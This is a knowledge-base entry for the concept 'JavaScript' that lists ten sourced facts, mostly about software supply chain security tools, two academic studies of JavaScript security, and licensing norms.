concept

JavaScript

Facts (10)

Sources

bureado/awesome-software-supply-chain-security - GitHub github.com GitHub 7 facts

referencegoogle/oss-rebuild automates reproducible building and generates SLSA Provenance for Python, JavaScript/TypeScript, and Rust packages to detect supply chain compromises, featuring build observability, dynamic analysis, and support for historical package attestation.

referencesns45/forgeseal is a supply chain security command-line interface for JavaScript and TypeScript that generates CycloneDX Software Bill of Materials (SBOMs), signs them using Sigstore keyless signing, produces SLSA v1 provenance attestations, and triages vulnerabilities using OSV.dev.

claimSocket is a tool focused on JavaScript that allows users to find and compare millions of open source packages.

referenceThe SAP-samples/risk-explorer-execution-pocs repository provides runnable proof-of-concept implementations that demonstrate how third-party dependencies can achieve arbitrary code execution at both install time and runtime across multiple ecosystems, including Python, JavaScript, Ruby, PHP, Rust, Go, and Java.

claimThe sonatype-nexus-community/auditjs tool audits JavaScript projects using Sonatype OSS Index or Nexus Lifecycle.

referenceHuskyCI, developed by Globo.com, orchestrates security tests and centralizes results for analysis across multiple programming languages including Python, Ruby, JavaScript, Go, Java, and HCL, utilizing SAST tools, GitLeaks for secrets scanning, and SCA tools.

referenceknostic/OpenAnt is an LLM-based vulnerability discovery tool that proactively identifies verified security flaws while minimizing false positives and negatives, supporting Go, Python, JavaScript/TypeScript, C/C++, PHP, and Ruby.

A Mixed-Methods Study of Open-Source Software Maintainers On ... arxiv.org arXiv Feb 3, 2025 2 facts

referenceHassan Onsori Delicheh, Alexandre Decan, and Tom Mens quantified security issues in reusable JavaScript actions within GitHub workflows in a 2024 study published in the Proceedings of the 21st International Conference on Mining Software Repositories.

referenceVinuri Bandara, Thisura Rathnayake, Nipuna Weerasekara, Charitha Elvitigala, Kenneth Thilakarathna, Primal Wijesekera, and Chamath Keppitiyagama analyzed real-world remediation of fix commits in JavaScript projects in a 2020 study published in the IEEE 20th International Working Conference on Source Code Analysis and Manipulation.

The Complete Guide to Open Source Licenses - FOSSA fossa.com FOSSA 1 fact

claimDifferent programming communities have established licensing norms, such as JavaScript projects commonly using the MIT license and Java projects often using the Apache 2.0 license.